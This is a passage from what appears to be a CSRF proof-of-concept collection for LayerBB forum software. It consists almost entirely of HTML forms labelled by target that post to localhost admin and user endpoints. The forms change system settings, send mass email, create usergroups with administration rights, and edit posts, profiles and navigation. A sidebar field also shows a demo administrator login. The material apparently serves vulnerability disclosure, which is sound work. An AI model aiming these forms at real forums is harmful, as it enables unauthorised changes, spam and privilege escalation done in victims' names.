type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br> <label for="labels">Labels</label> <small>Each Line is a new label. 
HTML enabled.</small> <textarea name="labels" id="labels" class="form-control"></textarea><br> <input type="submit" name="update" value="Save Changes" class="btn btn-default"> </form> <!-- Edit Node CSRF End --> <!-- System Settings CSRF --> <form action="http://localhost/admin/general.php" enctype="multipart/form-data" method="POST"><section class="col-lg-12"> <div class="box box-success"> <div class="box-header"> <div class="tab-content" style="padding: 25px;"> <br> <label for="site_name">Board Name</label> <input type="text" class="form-control" name="site_name" id="site_name" value="LayerBB Demo"> <label for="board_email">Board Email</label> <input type="text" class="form-control" name="board_email" id="board_email" value="[email protected]"> <label for="number_subs">Number of shown subforums</label> <input type="text" class="form-control" name="number_subs" id="number_subs" value="3"> <input type="checkbox" name="register_enable" value="1" id="reg_enable" checked=""> <label for="reg_enable">Enable Registeration</label><br> <input type="checkbox" name="post_merge" value="1" id="post_merge" checked=""> <label for="post_merge">Merge Posts (<a href="#" title="Merge consecutive posts by the same user." id="tooltip">?</a>)</label><br> <input type="checkbox" name="site_enable" value="1" id="site_enable" checked=""> <label for="site_enable">Forum Enabled (<a href="#" title="Allows you to enable or disable your forums." id="tooltip">?</a>)</label><br> <input type="checkbox" name="email_verify" value="1" id="email_verify"> <label for="email_verify">Email Verification (<a href="#" title="Allows you to enable or disable email verification." id="tooltip">?</a>)</label><br> <input type="checkbox" name="enable_signatures" value="1" id="enable_signatures" checked=""> <label for="enable_signatures">Allow user signatures (<a href="#" title="Allows you to disable user signatures." 
id="tooltip">?</a>)</label><br> <input type="checkbox" name="enable_pcomments" value="1" id="enable_pcomments" checked=""> <label for="enable_pcomments">Enable Profile Comments (<a href="#" title="Allows you to disable profile comments." id="tooltip">?</a>)</label><br> <br> <label for="default_language">Default Languge</label><br> <select name="default_language" id="Default_language" class="form-control"> <option value="english" selected="">English</option> </select><br> <input type="checkbox" name="enable_rtl" value="1" id="enable_rtl"> <label for="enable_rtl">Enable RTL (<a href="#" title="Enable Right-to-left for languages that need RTL" id="tooltip">?</a>)</label><br><br> <label for="board_rules">Board Rules</label> <span id="helpBlock" class="help-block">HTML tags will be converted into ascii codes. Hyperlinks are not supported!</span> <textarea name="board_rules" class="form-control" style="min-height:250px;">- No spamming.</textarea> <br> <label for="offline_msg">Offline Message</label> <span id="helpBlock" class="help-block">HTML tags will be converted into ascii codes.</span> <textarea name="offline_msg" class="form-control" style="min-height:250px;"></textarea> <br> <label for="rcap_public">reCaptcha Public Key</label> <input type="text" name="rcap_public" id="rcap_public" class="form-control" value="0"> <label for="rcap_private">reCaptcha Private Key</label> <input type="text" name="rcap_private" id="rcap_private" class="form-control" value="0"> <input type="checkbox" name="enable_recaptcha" value="1"> Use reCaptcha<br> <br> <label for="content">Board Signature</label> <textarea id="editor" name="board_signature" class="form-control" style="min-height:250px;"></textarea> <div class="alert alert-info" role="alert"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div> <br> <label for="custom_logo">Easy Logo Changer</label> <input type="file" name="custom_logo" id="custom_logo" class="form-control"> </div><br> 
<center><input type="submit" name="update" class="btn btn-default" value="Save Settings"></center><br> </div> </div></section> </form> <!-- System Settings CSRF End --> <!-- Manage Category CSRF --> <table class="table table-hover"> <thead> <tr> <th style="width:70%">Category</th> <th style="width:10%">Order</th> <th style="width:20%">Controls</th> </tr> </thead> <tbody> <tr> <td> <strong>test cat</strong><br> <small>test cat</small> </td> <td> <form action="http://localhost/admin/manage_category.php" method="POST"> <input type="hidden" name="cat_id" value="2"> <input type="text" class="form-control" name="cat_place" value="1"> <input type="submit" name="change_place" style="display:none;"> </form> </td> <td> <div class="btn-group"> <li><a href="http://localhost/admin/edit_category.php/id/2">Edit Category</a></li> <li><a href="http://localhost/admin/manage_category.php/delete_category/2">Delete Category</a></li> </div> </td> </tr><tr> <td> <strong>First Category</strong><br> <small>First category on this forum!</small> </td> <td> <form action="http://localhost/admin/manage_category.php" method="POST"> <input type="hidden" name="cat_id" value="1"> <input type="text" class="form-control" name="cat_place" value="2"> <input type="submit" name="change_place" style="display:none;"> </form> </td> <td> <div class="btn-group"> <li><a href="http://localhost/admin/edit_category.php/id/1">Edit Category</a></li> <li><a href="http://localhost/admin/manage_category.php/delete_category/1">Delete Category</a></li> </div> </td> </tr> </tbody> </table> <center><h3>Use <font color="red">ENTER</font> to save catagory order</h3></center> <!-- Manage Category CSRF End --> <!-- Manage Node CSRF --> <table class="table table-hover"> <thead> <tr> <th style="width:70%">Node</th> <th style="width:10%">Order</th> <th style="width:20%">Controls</th> </tr> </thead> <tbody> <tr> <td> <strong><a href="#" target="_blank">First Node</a></strong><br> <small>The first node on this forum</small><br> 
<small>Sub-Forums: </small> </td> <td> <form action="http://localhost/admin/manage_node.php" method="POST"> <input type="hidden" name="node_id" value="1"> <input type="text" class="form-control" name="node_place" value="0"> <input type="submit" name="change_place" style="display:none;"> </form> </td> <td> <div class="btn-group"> <li><a href="http://localhost/admin/edit_node.php/id/1">Edit Node</a></li> <li><a href="http://localhost/admin/manage_node.php/delete_node/1">Delete Node</a></li> <li><a href="http://localhost/admin/manage_node.php/toggle_lock/1">Toggle Lock</a></li> </div> </td> </tr> </tbody> </table> <center><h3>Use <font color="red">ENTER</font> to save catagory order</h3></center> <!-- Manage Node CSRF End --> <!-- Mass Mail CSRF --> <form action="http://localhost/admin/massemail.php" method="POST" style="padding: 25px;"> <label for="subject">Subject</label> <input type="text" name="subject" id="subject" value="" class="form-control"> <label for="content">Email Content</label> <textarea id="editor" name="content" class="form-control" style="min-height:250px;"></textarea><br> <div class="alert alert-info" role="alert"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div> <input type="submit" name="send" value="Send Email" class="btn btn-default"> </form> <!-- Mass Mail CSRF End --> <!-- Navbar CSRF --> <form method="POST" action="http://localhost/admin/navbar.php"> <h4 class="modal-title" id="myModalLabel">Editing <b>google</b> Navbar Item</h4> <input type="hidden" name="id" value="1"> <div class="form-group"> <label for="title">URL Title</label> <input type="text" class="form-control" id="title" name="title" value="google"> </div> <div class="form-group"> <label for="url">URL</label> <input type="text" class="form-control" id="url" name="url" value="https://google.com"> </div> <div class="form-group"> <label for="newpage">Open URL in new page</label> <select class="form-control" id="newpage" name="newpage"> 
<option value="1">Current - Do Not Change</option> <option value="1">Yes</option> <option value="0">No</option> </select> </div> <div class="form-group"> <label for="order">Order</label> <input type="text" class="form-control" id="order" name="order" value="1"> </div> <button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button> </form> <!-- Navbar CSRF End --> <!-- New Category CSRF --> <form action="http://localhost/admin/new_category.php" method="POST" style="padding: 25px;"> <label for="cat_title">Title</label> <input type="text" name="cat_title" id="cat_title" class="form-control"> <label for="cat_desc">Description</label> <textarea name="cat_desc" id="cat_desc" class="form-control"></textarea> <br> <label for="allowed_usergroups">Allowed Usergroups</label> <br> <input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2" checked=""> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br> <br> <input type="submit" name="create" value="Create Category" class="btn btn-default"> </form> <!-- New Category CSRF End --> <!-- New Node CSRF --> <form action="http://localhost/admin/new_node.php" method="POST" style="padding: 25px;"> <label for="node_title">Title</label> <input type="text" name="node_title" id="node_title" class="form-control"> <label for="node_desc">Description</label> <textarea name="node_desc" id="node_desc" class="form-control"></textarea> <label for="parent">Parent</label><br> <select name="node_parent" id="parent"> <option value="1">First Category</option><option value="&1">&nbsp;&nbsp;&nbsp;&nbsp;-First Node</option> </select> <br> <label for="additional_option">Additional Options</label><br> <input type="checkbox" name="lock_node" value="1" id="lock_node"> <label style="font-weight: normal;" for="lock_node">Lock Node</label> <br> 
<label for="allowed_usergroups">Allowed Usergroups</label> <br> <input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2" checked=""> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br> <label for="labels">Labels</label> <small>Each Line is a new label. HTML enabled.</small> <textarea name="labels" id="labels" class="form-control"></textarea><br> <input type="submit" name="create" value="Create Node" class="btn btn-default"> </form> <!-- New Node CSRF End --> <!-- New Usergroup CSRF --> <form action="http://localhost/admin/new_usergroup.php" method="POST" style="padding: 25px;"> <label for="g_name">Name</label> <input type="text" name="g_name" id="g_name" class="form-control"> <label for="g_style">Style <small><code>%username%</code> will be replaced with the user's username.</small></label> <textarea name="g_style" id="g_style" class="form-control"><span>%username%</span></textarea> <label for="permissions">Permissions</label><br> <input type="checkbox" name="permissions[]" value="1"> view_forum<br><input type="checkbox" name="permissions[]" value="2"> create_thread<br><input type="checkbox" name="permissions[]" value="3"> reply_thread<br><input type="checkbox" name="permissions[]" value="4"> access_moderation<br><input type="checkbox" name="permissions[]" value="5"> access_administration<br> <br> <input type="checkbox" name="is_staff" value="1"> This Usergroup is staff. 
<br> <input type="submit" name="new" value="Create Usergroup" class="btn btn-default"> </form> <!-- New Usergroup CSRF End --> <!-- Profile Fields CSRF --> <form method="POST" action="http://localhost/admin/profile_fields.php" style="padding: 25px;"> <input type="hidden" name="id" value="1"> <div class="form-group"> <label for="title">Title</label> <input type="text" class="form-control" id="title" name="title" value="discord"> </div> <button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button> </form> <!-- Profile Fields CSRF End --> <!-- Sidebar CSRF --> <form method="POST" action="http://localhost/admin/sidebar.php" style="padding: 25px;"> <input type="hidden" name="id" value="1"> <div class="form-group"> <label for="title">Title</label> <input type="text" class="form-control" id="title" name="title" value="Demo Information"> </div> <div class="form-group"> <label for="content">Content</label> <textarea class="form-control" name="content" id="content" style="min-height:250px;"><div class="alert alert-danger" role="alert"> This is the LayerBB Demo Website, you can login using<br /><br /> User: Administrator <br />Pass: admin (Case sensitive)<br /><br />This demo gets refreshed every 24-hours.</div></textarea> </div> <div class="form-group"> <label for="style">Style</label> <select class="form-control" id="style" name="style"> <option value="danger">Current - Do Not Change</option> <option value="primary">Primary</option> <option value="success">Success</option> <option value="info">Info</option> <option value="warning">Warning</option> <option value="danger">Danger</option></select> </div> <div class="form-group"> <label for="glyphicon">Glyphicon (Optional)</label> <input type="text" class="form-control" id="glyphicon" name="glyphicon" value="alert"> </div> <div class="form-group"> <label for="order">Order</label> <input type="text" class="form-control" id="order" name="order" value="1"> </div> <button type="submit" 
name="savechange" id="savechange" class="btn btn-primary">Save Changes</button> </form> <!-- Sidebar CSRF End --> <!-- Edit Threads/Posts CSRF --> <form id="LAYER_form" action="http://localhost/edit.php/post/1" method="POST" style="padding: 25px;"> <input id="title" name="title" type="text" value="test"><br> <textarea id="editor" name="content" style="width: 100%; height: 300px; max-width: 100%; min-width: 100%;">test post</textarea> <br> <input type="submit" name="edit" value="Edit Post"> </form> <!-- Edit Threads/Posts CSRF End --> <!-- New Threads/Posts CSRF --> <form id="LAYER_form" action="http://localhost/new.php/node/1" method="POST" style="padding: 25px;"> <input type="text" name="title" placeholder="Thread Title..." style="width:100%;" class="col-sm-9 form-control"> <div class="clearfix"></div> <br> <textarea id="editor" style="width: 100%; height: 300px; max-width: 100%;" name="content"></textarea> <div class="center-block" style="margin-top:5px;"> <input type="submit" name="create" value="Create Thread"> </div> <br> <ul class="nav nav-tabs"> <li class="active"><a href="#polls" data-toggle="tab">Polls</a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="polls"> <div class="col-md-6"> <label for="question">Question</label> <input type="text" name="question"> <label for="answer_1">1. Answer</label> <input type="text" name="answer_1" id="answer_1"> <label for="answer_2">2. 
Answer</label> <input type="text" name="answer_2" id="answer_2"> <span class="btn btn-primary btn-xs" href="" onclick="plus();"> Add an answer field </span> </div> </div> </div> </form> <!-- New Threads/Posts CSRF End --> <!-- Thread Reply CSRF --> <form id="LAYER_form" action="http://localhost/reply.php/test.1" method="POST" style="padding: 25px;"> <textarea id="editor" style="width: 100%; height: 300px;" name="content"></textarea> <p class="pull-right" style="margin-top:5px;"> <input type="submit" name="reply" value="Post Reply"> </p> </form> <!-- Thread Reply CSRF End --> <!-- PM Reply CSRF --> <form id="%form_id%" action="http://localhost/conversations.php/cmd/reply/id/1" method="POST" style="padding: 25px;"> <textarea id="editor" style="width: 100%; height: 300px;" name="content"></textarea> <p class="pull-right" style="margin-top:5px;"> <input type="submit" name="reply" value="Post Reply"> </p> </form> <!-- PM Reply CSRF End --> <!-- Report Post CSRF --> <form action="http://localhost/report.php/post/1" id="LAYER_form" method="POST" style="padding: 25px;"> <label for="reason">Reason</label> <textarea name="reason" style="height:150px;width:100%;min-width:100%;max-width:100%;"></textarea> <br> <input type="submit" name="report" value="Report"> </form> <!-- Report Post CSRF End --> <!-- Edit Profile CSRF --> <form id="LAYER_form" action="http://localhost/profile.php/cmd/edit" method="POST" style="padding: 25px;"> <label for="email">Email</label> <input type="text" name="email" id="email" value="[email protected]"> <label for="usermsg">User Message</label> <input type="text" name="usermsg" id="usermsg" value="User"> <label for="gender">Gender</label> <select id="gender" name="gender"><option value="0" selected="selected">Not telling</option> <option value="1">Female</option> <option value="2">Male</option></select> <label for="timezone">Timezone</label> <select id="timezone" name="timezone"><option value="Pacific/Midway">(UTC-11:00) Midway Island</option><option 
value="Pacific/Samoa">(UTC-11:00) Samoa</option><option value="Pacific/Honolulu">(UTC-10:00) Hawaii</option><option value="US/Alaska">(UTC-09:00) Alaska</option><option value="America/Los_Angeles">(UTC-08:00) Pacific Time (US & Canada)</option><option value="America/Tijuana">(UTC-08:00) Tijuana</option><option value="US/Arizona">(UTC-07:00) Arizona</option><option value="America/Chihuahua">(UTC-07:00) Chihuahua</option><option value="America/Chihuahua">(UTC-07:00) La Paz</option><option value="America/Mazatlan">(UTC-07:00) Mazatlan</option><option value="US/Mountain">(UTC-07:00) Mountain Time (US & Canada)</option><option value="America/Managua">(UTC-06:00) Central America</option><option value="US/Central" selected="selected">(UTC-06:00) Central Time (US & Canada)</option><option value="America/Mexico_City">(UTC-06:00) Guadalajara</option><option value="America/Mexico_City">(UTC-06:00) Mexico City</option><option value="America/Monterrey">(UTC-06:00) Monterrey</option><option value="Canada/Saskatchewan">(UTC-06:00) Saskatchewan</option><option value="America/Bogota">(UTC-05:00) Bogota</option><option value="US/Eastern">(UTC-05:00) Eastern Time (US & Canada)</option><option value="US/East-Indiana">(UTC-05:00) Indiana (East)</option><option value="America/Lima">(UTC-05:00) Lima</option><option value="America/Bogota">(UTC-05:00) Quito</option><option value="Canada/Atlantic">(UTC-04:00) Atlantic Time (Canada)</option><option value="America/Caracas">(UTC-04:30) Caracas</option><option value="America/La_Paz">(UTC-04:00) La Paz</option><option value="America/Santiago">(UTC-04:00) Santiago</option><option value="Canada/Newfoundland">(UTC-03:30) Newfoundland</option><option value="America/Sao_Paulo">(UTC-03:00) Brasilia</option><option value="America/Argentina/Buenos_Aires">(UTC-03:00) Buenos Aires</option><option value="America/Argentina/Buenos_Aires">(UTC-03:00) Georgetown</option><option value="America/Godthab">(UTC-03:00) Greenland</option><option 
value="America/Noronha">(UTC-02:00) Mid-Atlantic</option><option value="Atlantic/Azores">(UTC-01:00) Azores</option><option value="Atlantic/Cape_Verde">(UTC-01:00) Cape Verde Is.</option><option value="Africa/Casablanca">(UTC+00:00) Casablanca</option><option value="Europe/London">(UTC+00:00) Edinburgh</option><option value="Etc/Greenwich">(UTC+00:00) Greenwich Mean Time : Dublin</option><option value="Europe/Lisbon">(UTC+00:00) Lisbon</option><option value="Europe/London">(UTC+00:00) London</option><option value="Africa/Monrovia">(UTC+00:00) Monrovia</option><option value="UTC">(UTC+00:00) UTC</option><option value="Europe/Amsterdam">(UTC+01:00) Amsterdam</option><option value="Europe/Belgrade">(UTC+01:00) Belgrade</option><option value="Europe/Berlin">(UTC+01:00) Berlin</option><option value="Europe/Berlin">(UTC+01:00) Bern</option><option value="Europe/Bratislava">(UTC+01:00) Bratislava</option><option value="Europe/Brussels">(UTC+01:00) Brussels</option><option value="Europe/Budapest">(UTC+01:00) Budapest</option><option value="Europe/Copenhagen">(UTC+01:00) Copenhagen</option><option value="Europe/Ljubljana">(UTC+01:00) Ljubljana</option><option value="Europe/Madrid">(UTC+01:00) Madrid</option><option value="Europe/Paris">(UTC+01:00) Paris</option><option value="Europe/Prague">(UTC+01:00) Prague</option><option value="Europe/Rome">(UTC+01:00) Rome</option><option value="Europe/Sarajevo">(UTC+01:00) Sarajevo</option><option value="Europe/Skopje">(UTC+01:00) Skopje</option><option value="Europe/Stockholm">(UTC+01:00) Stockholm</option><option value="Europe/Vienna">(UTC+01:00) Vienna</option><option value="Europe/Warsaw">(UTC+01:00) Warsaw</option><option value="Africa/Lagos">(UTC+01:00) West Central Africa</option><option value="Europe/Zagreb">(UTC+01:00) Zagreb</option><option value="Europe/Athens">(UTC+02:00) Athens</option><option value="Europe/Bucharest">(UTC+02:00) Bucharest</option><option value="Africa/Cairo">(UTC+02:00) Cairo</option><option 
value="Africa/Harare">(UTC+02:00) Harare</option><option value="Europe/Helsinki">(UTC+02:00) Helsinki</option><option value="Europe/Istanbul">(UTC+02:00) Istanbul</option><option value="Asia/Jerusalem">(UTC+02:00) Jerusalem</option><option value="Europe/Helsinki">(UTC+02:00) Kyiv</option><option value="Africa/Johannesburg">(UTC+02:00) Pretoria</option><option value="Europe/Riga">(UTC+02:00) Riga</option><option value="Europe/Sofia">(UTC+02:00) Sofia</option><option value="Europe/Tallinn">(UTC+02:00) Tallinn</option><option value="Europe/Vilnius">(UTC+02:00) Vilnius</option><option value="Asia/Baghdad">(UTC+03:00) Baghdad</option><option value="Asia/Kuwait">(UTC+03:00) Kuwait</option><option value="Europe/Minsk">(UTC+03:00) Minsk</option><option value="Africa/Nairobi">(UTC+03:00) Nairobi</option><option value="Asia/Riyadh">(UTC+03:00) Riyadh</option><option value="Europe/Volgograd">(UTC+03:00) Volgograd</option><option value="Asia/Tehran">(UTC+03:30) Tehran</option><option value="Asia/Muscat">(UTC+04:00) Abu Dhabi</option><option value="Asia/Baku">(UTC+04:00) Baku</option><option value="Europe/Moscow">(UTC+04:00) Moscow</option><option value="Asia/Muscat">(UTC+04:00) Muscat</option><option value="Europe/Moscow">(UTC+04:00) St. 
Petersburg</option><option value="Asia/Tbilisi">(UTC+04:00) Tbilisi</option><option value="Asia/Yerevan">(UTC+04:00) Yerevan</option><option value="Asia/Kabul">(UTC+04:30) Kabul</option><option value="Asia/Karachi">(UTC+05:00) Islamabad</option><option value="Asia/Karachi">(UTC+05:00) Karachi</option><option value="Asia/Tashkent">(UTC+05:00) Tashkent</option><option value="Asia/Calcutta">(UTC+05:30) Chennai</option><option value="Asia/Kolkata">(UTC+05:30) Kolkata</option><option value="Asia/Calcutta">(UTC+05:30) Mumbai</option><option value="Asia/Calcutta">(UTC+05:30) New Delhi</option><option value="Asia/Calcutta">(UTC+05:30) Sri Jayawardenepura</option><option value="Asia/Katmandu">(UTC+05:45) Kathmandu</option><option value="Asia/Almaty">(UTC+06:00) Almaty</option><option value="Asia/Dhaka">(UTC+06:00) Astana</option><option value="Asia/Dhaka">(UTC+06:00) Dhaka</option><option value="Asia/Yekaterinburg">(UTC+06:00) Ekaterinburg</option><option value="Asia/Rangoon">(UTC+06:30) Rangoon</option><option value="Asia/Bangkok">(UTC+07:00) Bangkok</option><option value="Asia/Bangkok">(UTC+07:00) Hanoi</option><option value="Asia/Jakarta">(UTC+07:00) Jakarta</option><option value="Asia/Novosibirsk">(UTC+07:00) Novosibirsk</option><option value="Asia/Hong_Kong">(UTC+08:00) Beijing</option><option value="Asia/Chongqing">(UTC+08:00) Chongqing</option><option value="Asia/Hong_Kong">(UTC+08:00) Hong Kong</option><option value="Asia/Krasnoyarsk">(UTC+08:00) Krasnoyarsk</option><option value="Asia/Kuala_Lumpur">(UTC+08:00) Kuala Lumpur</option><option value="Australia/Perth">(UTC+08:00) Perth</option><option value="Asia/Singapore">(UTC+08:00) Singapore</option><option value="Asia/Taipei">(UTC+08:00) Taipei</option><option value="Asia/Ulan_Bator">(UTC+08:00) Ulaan Bataar</option><option value="Asia/Urumqi">(UTC+08:00) Urumqi</option><option value="Asia/Irkutsk">(UTC+09:00) Irkutsk</option><option value="Asia/Tokyo">(UTC+09:00) Osaka</option><option value="Asia/Tokyo">(UTC+09:00) 
Sapporo</option><option value="Asia/Seoul">(UTC+09:00) Seoul</option><option value="Asia/Tokyo">(UTC+09:00) Tokyo</option><option value="Australia/Adelaide">(UTC+09:30) Adelaide</option><option value="Australia/Darwin">(UTC+09:30) Darwin</option><option value="Australia/Brisbane">(UTC+10:00) Brisbane</option><option value="Australia/Canberra">(UTC+10:00) Canberra</option><option value="Pacific/Guam">(UTC+10:00) Guam</option><option value="Australia/Hobart">(UTC+10:00) Hobart</option><option value="Australia/Melbourne">(UTC+10:00) Melbourne</option><option value="Pacific/Port_Moresby">(UTC+10:00) Port Moresby</option><option value="Australia/Sydney">(UTC+10:00) Sydney</option><option value="Asia/Yakutsk">(UTC+10:00) Yakutsk</option><option value="Asia/Vladivostok">(UTC+11:00) Vladivostok</option><option value="Pacific/Auckland">(UTC+12:00) Auckland</option><option value="Pacific/Fiji">(UTC+12:00) Fiji</option><option value="Pacific/Kwajalein">(UTC+12:00) International Date Line West</option><option value="Asia/Kamchatka">(UTC+12:00) Kamchatka</option><option value="Asia/Magadan">(UTC+12:00) Magadan</option><option value="Pacific/Fiji">(UTC+12:00) Marshall Is.</option><option value="Asia/Magadan">(UTC+12:00) New Caledonia</option><option value="Asia/Magadan">(UTC+12:00) Solomon Is.</option><option value="Pacific/Auckland">(UTC+12:00) Wellington</option><option value="Pacific/Tongatapu">(UTC+13:00) Nuku'alofa</option></select> <br> <label for="location">Location</label> <select id="location" name="location"><option value="--" selected="selected">Nothing selected</option><option value="AD">Andorra</option><option value="AE">United Arab Emirates</option><option value="AF">Afghanistan</option><option value="AG">Antigua and Barbuda</option><option value="AI">Anguilla</option><option value="AL">Albania</option><option value="AM">Armenia</option><option value="AO">Angola</option><option value="AQ">Antarctica</option><option value="AR">Argentina</option><option 
value="AS">American Samoa</option><option value="AT">Austria</option><option value="AU">Australia</option><option value="AW">Aruba</option><option value="AX">Aland Islands</option><option value="AZ">Azerbaijan</option><option value="BA">Bosnia and Herzegovina</option><option value="BB">Barbados</option><option value="BD">Bangladesh</option><option value="BE">Belgium</option><option value="BF">Burkina Faso</option><option value="BG">Bulgaria</option><option value="BH">Bahrain</option><option value="BI">Burundi</option><option value="BJ">Benin</option><option value="BL">Saint Barthélemy</option><option value="BM">Bermuda</option><option value="BN">Brunei Darussalam</option><option value="BO">Bolivia</option><option value="BQ">Bonaire</option><option value="BR">Brazil</option><option value="BS">Bahamas</option><option value="BT">Bhutan</option><option value="BV">Bouvet Island</option><option value="BW">Botswana</option><option value="BY">Belarus</option><option value="BZ">Belize</option><option value="CA">Canada</option><option value="CC">Cocos Islands</option><option value="CD">Congo (the Democratic Republic)</option><option value="CF">Central African Republic</option><option value="CG">Congo</option><option value="CH">Switzerland</option><option value="CI">Cote d'Ivoire</option><option value="CK">Cook Islands</option><option value="CL">Chile</option><option value="CM">Cameroon</option><option value="CN">China</option><option value="CO">Colombia</option><option value="CR">Costa Rica</option><option value="CU">Cuba</option><option value="CV">Cabo Verde</option><option value="CW">Curacao</option><option value="CX">Christmas Island</option><option value="CY">Cyprus</option><option value="CZ">Czech Republic</option><option value="DE">Germany</option><option value="DJ">Djibouti</option><option value="DK">Denmark</option><option value="DM">Dominica</option><option value="DO">Dominican Republic</option><option value="DZ">Algeria</option><option 
value="EC">Ecuador</option><option value="EE">Estonia</option><option value="EG">Egypt</option><option value="EH">Western Sahara</option><option value="ER">Eritrea</option><option value="ES">Spain</option><option value="ET">Ethiopia</option><option value="FI">Finland</option><option value="FJ">Fiji</option><option value="FK">Falkland Islands</option><option value="FM">Micronesia</option><option value="FO">Faroe Islands</option><option value="FR">France</option><option value="GA">Gabon</option><option value="GB">United Kingdom</option><option value="GD">Grenada</option><option value="GE">Georgia</option><option value="GF">French Guiana</option><option value="GG">Guernsey</option><option value="GH">Ghana</option><option value="GI">Gibraltar</option><option value="GL">Greenland</option><option value="GM">Gambia</option><option value="GN">Guinea</option><option value="GP">Guadeloupe</option><option value="GQ">Equatorial Guinea</option><option value="GR">Greece</option><option value="GS">South Georgia and the South Sandwich Islands</option><option value="GT">Guatemala</option><option value="GU">Guam</option><option value="GW">Guinea-Bissau</option><option value="GY">Guyana</option><option value="HK">Hong Kong</option><option value="HM">Heard Island and McDonald Islands</option><option value="HN">Honduras</option><option value="HR">Croatia</option><option value="HT">Haiti</option><option value="HU">Hungary</option><option value="ID">Indonesia</option><option value="IE">Ireland</option><option value="IL">Israel</option><option value="IM">Isle of Man</option><option value="IN">India</option><option value="IO">British Indian Ocean Territory</option><option value="IQ">Iraq</option><option value="IR">Iran</option><option value="IS">Iceland</option><option value="IT">Italy</option><option value="JE">Jersey</option><option value="JM">Jamaica</option><option value="JO">Jordan</option><option value="JP">Japan</option><option value="KE">Kenya</option><option 
value="KG">Kyrgyzstan</option><option value="KH">Cambodia</option><option value="KI">Kiribati</option><option value="KM">Comoros</option><option value="KN">Saint Kitts and Nevis</option><option value="KP">The Democratic People's Republic of Korea</option><option value="KR">The Republic of Korea</option><option value="KW">Kuwait</option><option value="KY">Cayman Islands</option><option value="KZ">Kazakhstan</option><option value="LA">Lao People's Democratic Republic</option><option value="LB">Lebanon</option><option value="LC">Saint Lucia</option><option value="LI">Liechtenstein</option><option value="LK">Sri Lanka</option><option value="LR">Liberia</option><option value="LS">Lesotho</option><option value="LT">Lithuania</option><option value="LU">Luxembourg</option><option value="LV">Latvia</option><option value="LY">Libya</option><option value="MA">Morocco</option><option value="MC">Monaco</option><option value="MD">Moldova</option><option value="ME">Montenegro</option><option value="MF">Saint Martin</option><option value="MG">Madagascar</option><option value="MH">Marshall Islands</option><option value="MK">Macedonia</option><option value="ML">Mali</option><option value="MM">Myanmar</option><option value="MN">Mongolia</option><option value="MO">Macao</option><option value="MP">Northern Mariana Islands</option><option value="MQ">Martinique</option><option value="MR">Mauritania</option><option value="MS">Montserrat</option><option value="MT">Malta</option><option value="MU">Mauritius</option><option value="MV">Maldives</option><option value="MW">Malawi</option><option value="MX">Mexico</option><option value="MY">Malaysia</option><option value="MZ">Mozambique</option><option value="NA">Namibia</option><option value="NC">New Caledonia</option><option value="NE">Niger</option><option value="NF">Norfolk Islands</option><option value="NG">Nigeria</option><option value="NI">Nicaragua</option><option value="NL">Netherlands</option><option value="NO">Norway</option><option 
value="NP">Nepal</option><option value="NR">Nauru</option><option value="NU">Niue</option><option value="NZ">New Zealand</option><option value="OM">Oman</option><option value="PA">Panama</option><option value="PE">Peru</option><option value="PF">French Polynesia</option><option value="PG">Papua New Guinea</option><option value="PH">Philippines</option><option value="PK">Pakistan</option><option value="PL">Poland</option><option value="PM">Saint Pierre and Miquelon</option><option value="PN">Pitcairn</option><option value="PR">Puerto Rico</option><option value="PS">Palestine</option><option value="PT">Portugal</option><option value="PW">Palau</option><option value="PY">Paraguay</option><option value="QA">Qatar</option><option value="RE">Réunion</option><option value="RO">Romania</option><option value="RS">Serbia</option><option value="RU">Russian Federation</option><option value="RW">Rwanda</option><option value="SA">Saudi Arabia</option><option value="SB">Solomon Islands</option><option value="SC">Seychelles</option><option value="SD">Sudan</option><option value="SE">Sweden</option><option value="SG">Singapore</option><option value="SH">Saint Helena</option><option value="SI">Slovenia</option><option value="SJ">Svalbard and Jan Mayen</option><option value="SK">Slovakia</option><option value="SL">Sierra Leone</option><option value="SM">San Marino</option><option value="SN">Senegal</option><option value="SO">Somalia</option><option value="SR">Suriname</option><option value="SS">South Sudan</option><option value="ST">Sao Tome and Pricipe</option><option value="SV">El Salvador</option><option value="SX">Sint Maarten</option><option value="SY">Syrian Arab Republic</option><option value="SZ">Swaziland</option><option value="TC">Turks and Caicos Islands</option><option value="TD">Chad</option><option value="TF">French Southern Terrotories</option><option value="TG">Togo</option><option value="TH">Thailand</option><option value="TJ">Tajikistan</option><option 
value="TK">Tokelau</option><option value="TL">Timor-Leste</option><option value="TM">Turkmenistan</option><option value="TN">Tunisia</option><option value="TO">Tonga</option><option value="TR">Turkey</option><option value="TT">Trinidad and Tobago</option><option value="TV">Tuvalu</option><option value="TW">Taiwan</option><option value="TZ">Tanzania</option><option value="UA">Ukraine</option><option value="UG">Uganda</option><option value="UM">United States Minor Outlying Islands</option><option value="US">United States</option><option value="UY">Uruguay</option><option value="UZ">Uzbekistan</option><option value="VA">Holy See</option><option value="VC">Venezuela</option><option value="VG">Virgin Islands (GB)</option><option value="VI">Virgin Islands (US)</option><option value="VN">Viet Nam</option><option value="VU">Vanatu</option><option value="WF">Wallis and Futuna</option><option value="WS">Samoa</option><option value="YE">Yemen</option><option value="YT">Mayotte</option><option value="ZA">South Africa</option><option value="ZM">Zambia</option><option value="ZW">Zimbabwe</option></select> <br> <label for="birthday">Birthday</label> <input type="text" name="birthday" id="birthday" value="0000-00-00"> <span id="helpBlock" class="help-block">In the format of: YYYY-MM-DD</span> <label for="editor">About You</label><br> <textarea name="about" id="editor" style="min-width: 100%; max-width: 100%; height: 150px;"></textarea> <br> <div class="panel panel-default"> <div class="panel-heading">Additional Profile Fields</div> <div class="panel-body"></div> </div> <br> <input type="submit" name="edit" value="Save Changes"> </form> <!-- Edit Profile CSRF End --> <!-- Edit Signature CSRF --> <form id="LAYER_form" action="http://localhost/profile.php/cmd/signature" method="POST" style="padding: 25px;"> <label 